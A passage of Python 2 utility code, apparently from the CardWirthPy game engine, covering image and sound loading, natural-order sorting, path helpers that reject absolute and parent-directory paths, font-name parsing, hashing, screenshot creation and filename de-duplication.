with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
if ext == ".bmp":
image = cw.imageretouch.patch_alphadata(image, ext, data)
else:
if not os.path.isfile(path):
return pygame.Surface((0, 0)).convert()
ext = os.path.splitext(path)[1].lower()
isbmp = ext == ".bmp"
ispng = ext == ".png"
isgif = ext == ".gif"
isjpg = ext in (".jpg", ".jpeg")
if ext == ".bmp":
with open(path, "rb") as f2:
data = f2.read()
f2.close()
bmpdepth = cw.image.get_bmpdepth(data)
data = cw.image.patch_rle4bitmap(data)
data, _ok = cw.image.fix_cwnext32bitbitmap(data)
with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
else:
with open(path, "rb") as f2:
data = f2.read()
f2.close()
with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
if ext == ".bmp":
image = cw.imageretouch.patch_alphadata(image, ext, data)
except:
print_ex()
#print u"画像が読み込めません(load_image)。リトライします", path
if retry:
try:
if f:
f.seek(0)
data = f.read()
elif cw.binary.image.path_is_code(path):
data = cw.binary.image.code_to_data(path)
else:
if not os.path.isfile(path):
return pygame.Surface((0, 0)).convert()
with open(path, "rb") as f2:
data = f2.read()
f2.close()
if not ispng:
bmpdepth = cw.image.get_bmpdepth(data)
data, _ok = cw.image.fix_cwnext32bitbitmap(data)
data, _ok = cw.image.fix_cwnext16bitbitmap(data)
with io.BytesIO(data) as f2:
r = load_image(path, mask, maskpos, f2, False, isback=isback, can_loaded_scaledimage=can_loaded_scaledimage,
noscale=noscale, up_scr=up_scr)
f2.close()
return r
except:
print_ex()
#print u"画像が読み込めません(リトライ後)", path
return pygame.Surface((0, 0)).convert()
# アルファチャンネルを持った透過画像を読み込んだ場合は
# SRCALPHA(0x00010000)のフラグがONになっている
if (bmpdepth in (0, 32)) and (image.get_flags() & pygame.locals.SRCALPHA):
image = image.convert_alpha()
else:
imageb = image
if image.get_bitsize() <= 8 and image.get_colorkey() and not isgif and isback:
# BUG: 環境によってイメージセルのマスク処理を行うと透過色が壊れる issue #723
mask = False
if isjpg and isback and not (cw.cwpy and cw.cwpy.sdata and cw.cwpy.sct.lessthan("1.30", cw.cwpy.sdata.get_versionhint())):
# BUG: JPEGイメージのマスク指定が無視される
# CardWirth 1.50
mask = False
# BUG: パレット使用時にconvert()を行うと同一色が全て透過されてしまう
# CardWirth 1.50
if not (bmpdepth == 16 and isbmp): # BUG: 16-bitビットマップでマスク色が有効にならない pygame 1.9.4
image = image.convert()
# カード画像がPNGの場合はマスクカラーを無視する(CardWirth 1.50の実装)
if image.get_colorkey() and ispng and not isback:
image.set_colorkey(None)
if mask and image.get_colorkey() and isgif:
# 256GIFでは強制的に左上マスク色が有効になる
if imageb.get_bitsize() <= 8:
maskpos = convert_maskpos(maskpos, image.get_width(), image.get_height())
image.set_colorkey(image.get_at(maskpos), pygame.locals.RLEACCEL)
elif mask and not image.get_colorkey():# PNGなどですでにマスクカラーが指定されている場合は除外
maskpos = convert_maskpos(maskpos, image.get_width(), image.get_height())
image.set_colorkey(image.get_at(maskpos), pygame.locals.RLEACCEL)
if not ispng and bmpdepth == 1 and mask and not isback or up_scr <> 1:
image = Depth1Surface(image, up_scr, bmpdepth)
return image
class Depth1Surface(pygame.Surface):
def __init__(self, surface, scr_scale, bmpdepth=24):
pygame.Surface.__init__(self, surface.get_size(), surface.get_flags(), surface.get_bitsize(), surface.get_masks())
self.blit(surface, (0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
colorkey = surface.get_colorkey()
self.set_colorkey(colorkey, pygame.locals.RLEACCEL)
self.bmpdepthis1 = surface.bmpdepthis1 if hasattr(surface, "bmpdepthis1") else (bmpdepth == 1)
self.scr_scale = scr_scale
def copy(self):
bmp = Depth1Surface(pygame.Surface.copy(self), self.scr_scale)
bmp.bmpdepthis1 = self.bmpdepthis1
return bmp
def convert_alpha(self):
bmp = Depth1Surface(pygame.Surface.convert_alpha(self), self.scr_scale, bmpdepth=32)
bmp.bmpdepthis1 = False
return bmp
def calc_imagesize(image):
"""imageのデータサイズを概算する。
結果は正確ではない。
"""
return image.get_bitsize() * image.get_width() * image.get_height() // 8
def calc_wxbmpsize(wxbmp):
"""wx.Bitmapのデータサイズを概算する。
結果は正確ではない。
"""
return wxbmp.GetDepth() * wxbmp.GetWidth() * wxbmp.GetHeight() // 8
def put_number(image, num):
"""アイコンサイズの画像imageの上に
numの値を表示する。
"""
image = image.convert_alpha()
s = str(num)
if len(s) == 1:
font = cw.cwpy.rsrc.fonts["statusimg1"]
elif len(s) == 2:
font = cw.cwpy.rsrc.fonts["statusimg2"]
else:
font = cw.cwpy.rsrc.fonts["statusimg3"]
h = font.get_height()
w = (h+1) / 2
subimg = pygame.Surface((len(s)*w, h)).convert_alpha()
subimg.fill((0, 0, 0, 0))
x = image.get_width() - subimg.get_width() - cw.s(1)
y = image.get_height() - subimg.get_height()
pos = (x, y)
for i, c in enumerate(s):
cimg = font.render(c, 2 <= cw.UP_SCR, (0, 0, 0))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]+1))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]-1))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]+1))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]-1))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]))
image.blit(cimg, (pos[0] + i*w, pos[1]+1))
image.blit(cimg, (pos[0] + i*w, pos[1]-1))
cimg = font.render(c, 2 <= cw.UP_SCR, (255, 255, 255))
image.blit(cimg, (pos[0] + i*w, pos[1]))
return image
def get_imageext(b):
"""dataが画像であれば対応する拡張子を返す。"""
if 22 < len(b) and 'B' == b[0] and 'M' == b[1]:
return ".bmp"
if 25 <= len(b) and 0x89 == ord(b[0]) and 'P' == b[1] and 'N' == b[2] and 'G' == b[3]:
return ".png"
if 10 <= len(b) and 'G' == b[0] and 'I' == b[1] and 'F' == b[2]:
return ".gif"
if 6 <= len(b) and 0xFF == ord(b[0]) and 0xD8 == ord(b[1]):
return ".jpg"
if 10 <= len(b):
if 'M' == b[0] and 'M' == b[1] and 42 == ord(b[3]):
return ".tiff"
elif 'I' == b[0] and 'I' == b[1] and 42 == ord(b[2]):
return ".tiff"
return ""
def get_facepaths(sexcoupon, agecoupon, adddefaults=True):
"""sexとageに対応したFaceディレクトリ内の画像パスを辞書で返す。
辞書の内容は、(ソートキー, ディレクトリ, ディレクトリ表示名)をキーにした
当該ディレクトリ内のファイルパスのlistとなる。
sexcoupon: 性別クーポン。
agecoupon: 年代クーポン。
adddefaults: 1件もなかった場合、Resource/Image/Cardにある
FATHERまたはMOTHERを使用する。
"""
imgpaths = {}
sex = ""
for f in cw.cwpy.setting.sexes:
if sexcoupon == u"_" + f.name:
sex = f.subname
age = ""
for f in cw.cwpy.setting.periods:
if agecoupon == u"_" + f.name:
age = f.abbr
dpaths = [] # (実際のパス, 表示するパス)
facedir1 = cw.util.join_paths(cw.cwpy.skindir, u"Face") # スキン付属
facedir2 = u"Data/Face" # 全スキン共通
for i, facedir in enumerate((facedir1, facedir2)):
def add(weight, dpath1):
dpath = join_paths(facedir, dpath1)
if i == 0:
name = cw.cwpy.setting.skinname
else:
name = cw.cwpy.msgs["common"]
dpaths.append((i * 10 + weight, u"<%s> %s" % (name, dpath1), dpath))
# 性別・年代限定
if sex and age:
add(0, sex + u"-" + age)
# 性別限定
if sex:
add(1, sex)
# 年代限定
if age:
add(2, u"Common-" + age)
# 汎用
add(3, u"Common")
passed = set()
_get_facepaths(facedir, imgpaths, dpaths, passed)
if not imgpaths and adddefaults:
seq = []
dpath = join_paths(cw.cwpy.skindir, u"Resource/Image/Card")
for sex in cw.cwpy.setting.sexes:
if u"_" + sex.name == sexcoupon:
if sex.father:
fpath = join_paths(dpath, "FATHER")
fpath = find_resource(fpath, cw.M_IMG)
seq.append(fpath)
if sex.mother:
fpath = join_paths(dpath, "MOTHER")
fpath = find_resource(fpath, cw.M_IMG)
seq.append(fpath)
break
if seq:
imgpaths[(dpath, u"Resource/Image/Card")] = seq
return imgpaths
def _get_facepaths(facedir, imgpaths, dpaths, passed):
for sortkey, showdpath, dpath in dpaths:
if not os.path.isdir(dpath):
continue
abs = os.path.abspath(dpath)
abs = os.path.normpath(abs)
abs = os.path.normcase(abs)
if abs in passed:
continue
passed.add(abs)
dpaths2 = [][:]
seq = []
scales = u"|".join(map(lambda s: str(s), cw.SCALE_LIST))
re_xn = re.compile(u"\\A.+\.x(%s)\\Z" % (scales), re.IGNORECASE)
for fname in os.listdir(dpath):
path1 = join_paths(dpath, fname)
path = get_linktarget(path1)
if os.path.isfile(path):
spext = os.path.splitext(path)
ext = spext[1].lower()
if ext in cw.EXTS_IMG and not re_xn.match(spext[0]):
seq.append(path)
elif os.path.isdir(path):
showpath = join_paths(showdpath, fname)
if sys.platform == "win32" and path1 <> path and showpath.lower().endswith(".lnk"):
showpath = os.path.splitext(showpath)[0]
dpaths2.append((sortkey, showpath, path))
if seq:
p = join_paths(relpath(dpath, facedir))
if p.startswith("../"):
p = dpath
imgpaths[(sortkey, showdpath, join_paths(p))] = seq
if dpaths2:
_get_facepaths(facedir, imgpaths, dpaths2, passed)
def load_bgm(path):
"""Pathの音楽ファイルをBGMとして読み込む。
リピートして鳴らす場合は、cw.audio.MusicInterface参照。
winmm.dllを利用して再生する場合は1(Windowsのみ)、
bass.dllを利用して再生する場合は2、
失敗した場合は-1を返す。
path: 音楽ファイルのパス。
"""
if threading.currentThread() <> cw.cwpy:
raise Exception()
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
if not os.path.isfile(path) or not cw.bassplayer.is_alivablewithpath(path):
return
if cw.util.splitext(path)[1].lower() in (".mpg", ".mpeg"):
return 1
if cw.bassplayer.is_alivablewithpath(path):
return 2
path = get_soundfilepath("Bgm", path)
cw.util.print_ex()
print u"BGMが読み込めません", path
return -1
def load_sound(path):
"""効果音ファイルを読み込み、SoundInterfaceを返す。
読み込めなかった場合は、無音で再生するSoundInterfaceを返す。
path: 効果音ファイルのパス。
"""
if threading.currentThread() <> cw.cwpy:
raise Exception()
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
if not os.path.isfile(path) or not cw.bassplayer.is_alivablewithpath(path):
return SoundInterface()
if cw.cwpy.is_playingscenario() and path in cw.cwpy.sdata.resource_cache:
return cw.cwpy.sdata.resource_cache[path].copy()
try:
assert threading.currentThread() == cw.cwpy
if cw.bassplayer.is_alivablewithpath(path):
# BASSが使用できる場合
sound = SoundInterface(path, path, is_midi=is_midi(path))
elif sys.platform == "win32" and (path.lower().endswith(".wav") or\
path.lower().endswith(".mp3")):
# WinMMを使用する事でSDL_mixerの問題を避ける
# FIXME: mp3効果音をWindows環境でしか再生できない
sound = SoundInterface(path, path, is_midi=is_midi(path))
else:
return SoundInterface()
except:
print u"サウンドが読み込めません", path
return SoundInterface()
if cw.cwpy.is_playingscenario():
cw.cwpy.sdata.sweep_resourcecache(os.path.getsize(path) if os.path.isfile(path) else 0)
cw.cwpy.sdata.resource_cache[path] = sound
return sound.copy()
def is_midi(path):
"""pathがMIDIファイルか判定する。"""
try:
if os.path.isfile(path) and 4 <= os.path.getsize(path):
with open(path, "rb") as f:
return f.read(4) == "MThd"
except:
pass
return os.path.splitext(path)[1].lower() in (".mid", ".midi")
def get_soundfilepath(basedir, path):
"""宿のフォルダにある場合は問題が出るため、
再生用のコピーを生成する。
"""
if path and cw.cwpy.ydata and (path.startswith(cw.cwpy.ydata.yadodir) or\
path.startswith(cw.cwpy.ydata.tempdir)):
dpath = join_paths(cw.tempdir, u"Playing", basedir)
fpath = os.path.basename(path)
fpath = join_paths(dpath, fpath)
fpath = cw.binary.util.check_duplicate(fpath)
if not os.path.isdir(dpath):
os.makedirs(dpath)
shutil.copyfile(path, fpath)
path = fpath
return path
def remove_soundtempfile(basedir):
"""再生用のコピーを削除する。
"""
dpath = join_paths(cw.tempdir, u"Playing", basedir)
if os.path.isdir(dpath):
remove(dpath)
if not os.listdir(join_paths(cw.tempdir, u"Playing")):
remove(dpath)
def _sorted_by_attr_impl(d, seq, *attr):
if attr:
get = operator.attrgetter(*attr)
else:
get = lambda a: a
re_num = re.compile(u"( *[0-9]+ *)| +")
str_table = {}
class LogicalStr(object):
def __init__(self, s):
self.seq = []
if not s:
return
pos = 0
self.s = s
while s <> u"":
m = re_num.search(s, pos=pos)
if m is None:
self.seq.append(s[pos:].lower())
break
si = m.start()
ei = m.end()
self.seq.append(s[pos:si].lower())
ss = s[si:ei]
if ss.isspace():
self.seq.append((0, ss))
else:
self.seq.append((int(ss), ss))
pos = ei
def __cmp__(self, other):
r = cmp(self.seq, other.seq)
if r:
return r
return cmp(self.s, other.s)
def logical_cmp_str(a, b):
if not (isinstance(a, (str, unicode)) and isinstance(b, (str, unicode))):
return cmp(a, b)
if a in str_table:
al = str_table[a]
else:
al = LogicalStr(a)
str_table[a] = al
if b in str_table:
bl = str_table[b]
else:
bl = LogicalStr(b)
str_table[b] = bl
return cmp(al, bl)
def logical_cmp_impl(a, b):
if (isinstance(a, tuple) and isinstance(b, tuple)) or\
(isinstance(a, list) and isinstance(b, list)):
r = 0
for i in xrange(max(len(a), len(b))):
if len(a) <= i:
return -1
if len(b) <= i:
return 1
aval = a[i]
bval = b[i]
r = logical_cmp_impl(aval, bval)
if r <> 0:
break
return r
else:
r = logical_cmp_str(a, b)
return r
def logical_cmp(aobj, bobj):
a = get(aobj)
b = get(bobj)
return logical_cmp_impl(a, b)
if d:
seq.sort(key=functools.cmp_to_key(logical_cmp))
return seq
else:
return sorted(seq, key=functools.cmp_to_key(logical_cmp))
def cmp2(a, b):
#PyLite:TODO:保存時にエラーが出るのでリネーム
if a is None and b is None:
return 0
elif a is None:
return -1
elif b is None:
return 1
elif type(a) is type(b):
if a < b:
return -1
elif b < a:
return 1
else:
if type(a) is int:
return -1
else:
return 1
return 0
def sorted_by_attr(seq, *attr):
"""非破壊的にオブジェクトの属性でソートする。
seq: リスト
attr: 属性名
"""
return _sorted_by_attr_impl(False, seq, *attr)
def sort_by_attr(seq, *attr):
"""破壊的にオブジェクトの属性でソートする。
seq: リスト
attr: 属性名
"""
return _sorted_by_attr_impl(True, seq, *attr)
assert sort_by_attr(["a1234b", "a12b", "a1234b"]) == ["a12b", "a1234b", "a1234b"]
assert sort_by_attr(["a12b", "a1234b", "a1b", "a9b", "a01234b", "a1234b", "a-."]) == ["a1b", "a9b", "a12b", "a01234b", "a1234b", "a1234b", "a-."]
assert sort_by_attr([(1, "a"), None, (0, "b"), (0, "c")]) == [None, (0, "b"), (0, "c"), (1, "a")]
def new_order(seq, mode=1):
"""order属性を持つアイテムのlistを
走査して新しいorderを返す。
必要であれば、seq内のorderを振り直す。
mode: 0=最大order。1=最小order。orderの振り直しが発生する
"""
if mode == 0:
order = -1
for item in seq:
order = max(item.order, order)
return order + 1
else:
for item in seq:
item.order += 1
return 0
def join_paths(*paths):
"""パス結合。ディレクトリの区切り文字はプラットホームに関わらず"/"固定。
セキュリティ上の問題を避けるため、あえて絶対パスは取り扱わない。
*paths: パス結合する文字列
"""
return "/".join(filter(lambda a: a, paths)).replace("\\", "/").rstrip("/")
# FIXME: パスによって以下のような警告が標準エラー出力に出るようだが、詳細が分からない。
# ***\ntpath.py:533: UnicodeWarning: Unicode unequal comparison failed to convert both arguments to Unicode - interpreting them as being unequal
# おそらく実際的な問題は発生しないので、とりあえず警告を無効化する。
import warnings
warnings.filterwarnings("ignore", category=UnicodeWarning)
def relpath(path, start):
if len(start) < len(path) and path.startswith(start) and start <> "":
path2 = path[len(start):]
if path2[0] == '/' or (sys.platform == "win32" and path2[0] == '\\'):
return path2[1:]
try:
path = os.path.abspath(path)
return os.path.relpath(path, start)
except:
return path
assert relpath("Data/abc", "Data") == "abc"
assert relpath("Data/abc/def", "Data").replace("\\", "/") == "abc/def"
assert relpath("Data/abc/def", "Data/abc/").replace("\\", "/") == "def"
assert relpath("Data/abc/def", "Data/abc") == os.path.relpath("Data/abc/def", "Data/abc")
assert relpath("Data/abc/def", "..").replace("\\", "/") == os.path.relpath("Data/abc/def", "..").replace("\\", "/")
assert relpath(".", "..").replace("\\", "/") == os.path.relpath(".", "..").replace("\\", "/")
assert relpath("/a", "..").replace("\\", "/") == os.path.relpath("/a", "..").replace("\\", "/")
assert relpath("a", "../bcde").replace("\\", "/") == os.path.relpath("a", "../bcde").replace("\\", "/")
assert relpath("../a", "../bcde").replace("\\", "/") == os.path.relpath("../a", "../bcde").replace("\\", "/")
assert relpath("../a", "../").replace("\\", "/") == os.path.relpath("../a", "../").replace("\\", "/")
def validate_filepath(fpath):
"""
fpathが絶対パスまたは外部ディレクトリを指定する
相対パスであれば空文字列に置換する。
"""
if isinstance(fpath, list):
seq = []
for f in fpath:
f = validate_filepath(f)
if f:
seq.append(f)
return seq
else:
from cw.binary.image import path_is_code
if not fpath:
return ""
if cw.binary.image.path_is_code(fpath):
return fpath
if os.path.isabs(fpath):
return ""
else:
n = join_paths(os.path.normpath(fpath))
if n == ".." or n.startswith("../"):
return ""
return fpath
assert validate_filepath(["/test/abc", None, "test/../test", "test/../../abc", "../abc"]) ==\
["test/../test"]
def is_descendant(path, start):
"""
pathはstartのサブディレクトリにあるか。
ある場合は相対パスを返す。
"""
if not path or not start:
return False
rel = join_paths(relpath(path, start))
if os.path.isabs(rel):
return False
if rel.startswith("../"):
return False
return rel
def splitext(p):
"""パスの拡張子以外の部分と拡張子部分の分割。
os.path.splitext()との違いは、".ext"のような
拡張子部分だけのパスの時、(".ext", "")ではなく
("", ".ext")を返す事である。
"""
p = os.path.splitext(p)
if p[0].startswith(".") and not p[1]:
return (p[1], p[0])
return p
def str2bool(s):
"""特定の文字列をbool値にして返す。
s: bool値に変換する文字列(true, false, 1, 0など)。
"""
if isinstance(s, bool):
return s
else:
s = s.lower()
if s == "true":
return True
elif s == "false":
return False
elif s == "1":
return True
elif s == "0":
return False
else:
raise ValueError("%s is incorrect value!" % (s))
def numwrap(n, nmin, nmax):
"""最小値、最大値の範囲内でnの値を返す。
n: 範囲内で調整される値。
nmin: 最小値。
nmax: 最大値。
"""
if n < nmin:
n = nmin
elif n > nmax:
n = nmax
return n
def div_vocation(value):
"""能力判定のために能力値を2で割る。
0以上の場合とマイナス値の場合で式が異なる。
"""
if value < 0:
return (value+2) // 2
else:
return (value+1) // 2
def get_truetypefontname(path):
"""引数のTrueTypeFontファイルを読み込んで、フォントネームを返す。
ref http://mail.python.org/pipermail/python-list/2008-September/508476.html
path: TrueTypeFontファイルのパス。
"""
#customize path
with open(path, "rb") as f:
#header
shead= struct.Struct( ">IHHHH" )
fhead= f.read( shead.size )
dhead= shead.unpack_from( fhead, 0 )
#font directory
stable= struct.Struct( ">4sIII" )
ftable= f.read( stable.size* dhead[ 1 ] )
for i in xrange( dhead[1] ): #directory records
dtable= stable.unpack_from(
ftable, i* stable.size )
if dtable[0]== "name": break
assert dtable[0]== "name"
#name table
f.seek( dtable[2] ) #at offset
fnametable= f.read( dtable[3] ) #length
snamehead= struct.Struct( ">HHH" ) #name table head
dnamehead= snamehead.unpack_from( fnametable, 0 )
sname= struct.Struct( ">HHHHHH" )
fontname = ""
for i in xrange( dnamehead[1] ): #name table records
dname= sname.unpack_from(fnametable, snamehead.size+ i* sname.size )
if dname[3]== 4: #key == 4: "full name of font"
s= struct.unpack_from(
'%is'% dname[4], fnametable,
dnamehead[2]+ dname[5] )[0]
if dname[:3] == (1, 0, 0):
fontname = s
elif dname[:3] == (3, 1, 1033):
s = s.split("\x00")
fontname = "".join(s)
f.close()
return fontname
def get_md5(path):
"""MD5を使ったハッシュ値を返す。
path: ハッシュ値を求めるファイルのパス。
"""
m = hashlib.md5()
with open(path, "rb") as f:
while True:
data = f.read(32768)
if not data:
break
m.update(data)
f.close()
return m.hexdigest()
def get_md5_from_data(data):
"""MD5を使ったハッシュ値を返す。
path: ハッシュ値を求めるファイルのパス。
"""
m = hashlib.md5()
m.update(data)
return m.hexdigest()
def number_normalization(value, fromvalue, tovalue):
"""数値を範囲内の値に正規化する。
value: 正規化対象の数値。
fromvalue: 範囲の最小値。
tovalue: 範囲の最大値+1。
"""
if 0 == tovalue:
return value
if tovalue <= value or value < fromvalue:
value -= (value // tovalue) * tovalue
if value < fromvalue:
value += tovalue
return value
def print_ex(file=None):
"""例外の内容を標準出力に書き足す。
"""
if file is None:
file = sys.stdout
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, file=file)
file.write("\n")
return
def screenshot_title(titledic):
"""スクリーンショットタイトルの書き出し。
"""
title = format_title(cw.cwpy.setting.ssinfoformat, titledic)
return title
def screenshot_header(title, w):
"""スクリーンショット情報の書き出し。
"""
fore = cw.cwpy.setting.ssinfofontcolor
back = cw.cwpy.setting.ssinfobackcolor
font = cw.cwpy.rsrc.fonts["screenshot"]
fh = font.size("#")[1]
lh = fh + 2
imgs = []
for color in (fore, back):
subimg = font.render(title, True, color)
swmax = w - cw.s(5)*2
if swmax < subimg.get_width():
size = (swmax, subimg.get_height())
subimg = cw.image.smoothscale(subimg, size)
imgs.append(subimg)
imgs[1].fill((255, 255, 255, 80), special_flags=pygame.locals.BLEND_RGBA_MULT)
return imgs[0], imgs[1], fh, lh
def screenshot():
"""スクリーンショットをファイルへ書き出す。
"""
cw.cwpy.play_sound("screenshot")
titledic, titledicfn = cw.cwpy.get_titledic(with_datetime=True, for_fname=True)
filename = create_screenshotfilename(titledicfn)
try:
dpath = os.path.dirname(filename)
if os.path.isdir(dpath):
fpath = dupcheck_plus(filename, yado=False)
else:
os.makedirs(dpath)
bmp, y = create_screenshot(titledic)
encoding = sys.getfilesystemencoding()
pygame.image.save(bmp, filename.encode(encoding))
except:
s = u"スクリーンショットの保存に失敗しました。\n%s" % (filename)
cw.cwpy.call_modaldlg("ERROR", text=s)
def create_screenshotfilename(titledic):
"""スクリーンショット用のファイルパスを作成する。
"""
fpath = format_title(cw.cwpy.setting.ssfnameformat, titledic)
if not os.path.splitext(fpath)[1].lower() in cw.EXTS_IMG:
fpath += ".png"
return fpath
def create_screenshot(titledic):
"""スクリーンショットを作成する。
"""
title = screenshot_title(titledic)
scr = pygame.Surface(cw.cwpy.scr_draw.get_size()).convert()
cw.cwpy.draw_to(scr, False)
if title:
back = cw.cwpy.setting.ssinfobackcolor
w = cw.s(cw.SIZE_GAME[0])
subimg, subimg2, fh, lh = screenshot_header(title, w)
if cw.cwpy.setting.sswithstatusbar:
h = cw.s(cw.SIZE_GAME[1]) + lh
else:
h = cw.s(cw.SIZE_AREA[1]) + lh
bmp = pygame.Surface((w, h)).convert()
bmp.fill(back, rect=pygame.Rect(cw.s(0), cw.s(0), w, lh))
if cw.cwpy.setting.ssinfobackimage and os.path.isfile(cw.cwpy.setting.ssinfobackimage):
subimg3 = load_image(cw.cwpy.setting.ssinfobackimage, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
else:
fpath = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir,
"Resource/Image/Other/SCREENSHOT_HEADER"),
cw.M_IMG)
if fpath:
subimg3 = load_image(fpath, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
bmp.blit(scr, (cw.s(0), lh))
x = cw.s(5)
y = (lh - fh) / 2
for xx in xrange(-1, 1+1):
for yy in xrange(-1, 1+1):
if xx <> x or yy <> y:
bmp.blit(subimg2, (x+xx, y+yy))
bmp.blit(subimg, (x, y))
y = lh
else:
if cw.cwpy.setting.sswithstatusbar:
bmp = scr
else:
bmp = scr.subsurface((cw.s((0, 0)), cw.s(cw.SIZE_AREA)))
y = cw.s(0)
return bmp, y
def card_screenshot():
""" パーティー所持カードのスクリーンショットをファイルへ書き出す。
"""
if cw.cwpy.ydata:
if cw.cwpy.ydata.party:
cw.cwpy.play_sound("screenshot")
titledic, titledicfn = cw.cwpy.get_titledic(with_datetime=True, for_fname=True)
#PyLite:通常SSパスと統合
filename = create_screenshotfilename(titledicfn)
try:
dpath = os.path.dirname(filename)
if os.path.isdir(dpath):
fpath = dupcheck_plus(filename, yado=False)
else:
os.makedirs(dpath)
bmp = create_cardscreenshot(titledic)
encoding = sys.getfilesystemencoding()
pygame.image.save(bmp, filename.encode(encoding))
except:
s = u"スクリーンショットの保存に失敗しました。\n%s" % (filename)
cw.cwpy.call_modaldlg("ERROR", text=s)
return True
return False
#def create_cardscreenshotfilename(titledic):
# """パーティー所持カードスクリーンショット用のファイルパスを作成する。
# """
# fpath = format_title(cw.cwpy.setting.ssfnameformat, titledic)
# if not os.path.splitext(fpath)[1].lower() in cw.EXTS_IMG:
# fpath += ".png"
# return fpath
def create_cardscreenshot(titledic):
"""パーティー所持カードスクリーンショットを作成する。
"""
pcards = [i for i in cw.cwpy.get_pcards()]
if pcards:
max_card = [2, 2, 2]
margin = 2
# 背景のタイル色
# タイトルバーに馴染む色にする
back = [map(lambda n: min(255, max(0, n / 2 + 88)), cw.cwpy.setting.ssinfobackcolor),
map(lambda n: min(255, max(0, n / 2 + 40)), cw.cwpy.setting.ssinfobackcolor)]
# カード数によってタイルのサイズを決定
for pcard in pcards:
for index in (cw.POCKET_SKILL, cw.POCKET_ITEM, cw.POCKET_BEAST):
max_card[index] = max(len(pcard.cardpocket[index]), max_card[index])
w = cw.s(95 + 80 * sum(max_card) + margin * (5 + sum(max_card)))
h = cw.s((130 + 2 * margin) * len(pcards))
title = screenshot_title(titledic)
if title:
subimg, subimg2, fh, lh = screenshot_header(title, w)
h += lh
bmp = pygame.Surface((w, h)).convert()
bmp.fill(cw.cwpy.setting.ssinfobackcolor, rect=pygame.Rect(cw.s(0), cw.s(0), w, h))
# 背景画像
if title:
if cw.cwpy.setting.ssinfobackimage and os.path.isfile(cw.cwpy.setting.ssinfobackimage):
subimg3 = load_image(cw.cwpy.setting.ssinfobackimage, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
else:
fpath = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir,
"Resource/Image/Other/SCREENSHOT_HEADER"),
cw.M_IMG)
if fpath:
subimg3 = load_image(fpath, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
# イメージの作成
sy = cw.s(0)
if title:
x, y = cw.s(5), (lh - fh) / 2
for xx in xrange(-1, 1+1):
for yy in xrange(-1, 1+1):
if xx <> x or yy <> y:
bmp.blit(subimg2, (x+xx, y+yy))
bmp.blit(subimg, (x, y))
sy += lh
for i in range(len(pcards)):
backindex = (1 + i) % 2
bmp.fill(back[backindex], rect=pygame.Rect(cw.s(0), sy, cw.s(95 + 2 * margin), cw.s(130 + 2 * margin)))
bmp.blit(pcards[i].cardimg.image, (cw.s(margin), sy + cw.s(margin)))
def blit_card(headers, x, sy):
for header in headers:
if header.negaflag:
header.negaflag = False
bmp.blit(header.cardimg.get_cardimg(header), (cw.s(x), sy + cw.s(10 + margin)))
x += 80 + margin
current_x = 95 + 2 * margin
next_x = 0
for index in (cw.POCKET_SKILL, cw.POCKET_ITEM, cw.POCKET_BEAST):
current_x += next_x
next_x = 80 * max_card[index] + margin * (max_card[index] + 1)
backindex = (index + i) % 2
bmp.fill(back[backindex], rect=pygame.Rect(cw.s(current_x), sy, cw.s(next_x), cw.s(130 + 2 * margin)))
adjust_x = (max_card[index] - len(pcards[i].cardpocket[index]))
x = current_x + adjust_x * 40 + margin * (2 + adjust_x) / 2
blit_card(pcards[i].cardpocket[index], x, sy)
sy += cw.s(130 + 2 * margin)
else:
raise
return bmp
def to_clipboard(s):
"""テキストsをクリップボードへ転写する。"""
tdo = wx.TextDataObject()
tdo.SetText(s)
if wx.TheClipboard.Open():
wx.TheClipboard.SetData(tdo)
wx.TheClipboard.Close()
wx.TheClipboard.Flush()
#-------------------------------------------------------------------------------
# ファイル操作関連
#-------------------------------------------------------------------------------
def dupcheck_plus(path, yado=True):
"""パスの重複チェック。引数のパスをチェックし、重複していたら、
ファイル・フォルダ名の後ろに"(n)"を付加して重複を回避する。
宿のファイルパスの場合は、"Data/Temp/Yado"ディレクトリの重複もチェックする。
"""
tempyado = cw.util.join_paths(cw.tempdir, u"Yado")
dpath, basename = os.path.split(path)
fname, ext = cw.util.splitext(basename)
fname = cw.binary.util.check_filename(fname.strip())
ext = ext.strip()
basename = fname + ext
path = join_paths(dpath, basename)
if yado:
if path.startswith("Yado"):
temppath = path.replace("Yado", tempyado, 1)
elif path.startswith(tempyado):
temppath = path.replace(tempyado, "Yado", 1)
else:
print u"宿パスの重複チェック失敗", path
temppath = ""
else:
temppath = ""
count = 2
while os.path.exists(path) or os.path.exists(temppath):
basename = "%s(%d)%s" % (fname, count, ext)
path = join_paths(dpath, basename)
if yado:
if path.startswith("Yado"):
temppath = path.replace("Yado", tempyado, 1)
elif path.startswith(tempyado):
temppath = path.replace(tempyado, "Yado", 1)
else:
print u"宿パスの重複チェック失敗", path
temppath = ""
count += 1
return join_paths(dpath, basename)
def repl_dischar(fname):
"""
ファイル名使用不可文字を代替文字に置換し、
両端に空白があった場合は削除する。
"""
d = {'\\': u'¥', '/': u'/', ':': u':', ',': u',', ';': u';',
'*': u'*', '?': u'?','"': u'”', '<': u'<', '>': u'>',
'|': u'|'}
for key, value in d.iteritems():
fname = fname.replace(key, value)
fname = fname.strip()
if fname == "":
fname = "noname"
return fname
def check_dischar(s):
"""
ファイル名使用不可文字を含んでいるかチェックする。
"""
seq = ('\\', '/', ':', ',', ';', '*', '?','"', '<', '>', '|', '"')
for i in seq:
if s.find(i) >= 0:
return True
return False
def join_yadodir(path):
"""
引数のpathを現在読み込んでいる宿ディレクトリと結合させる。
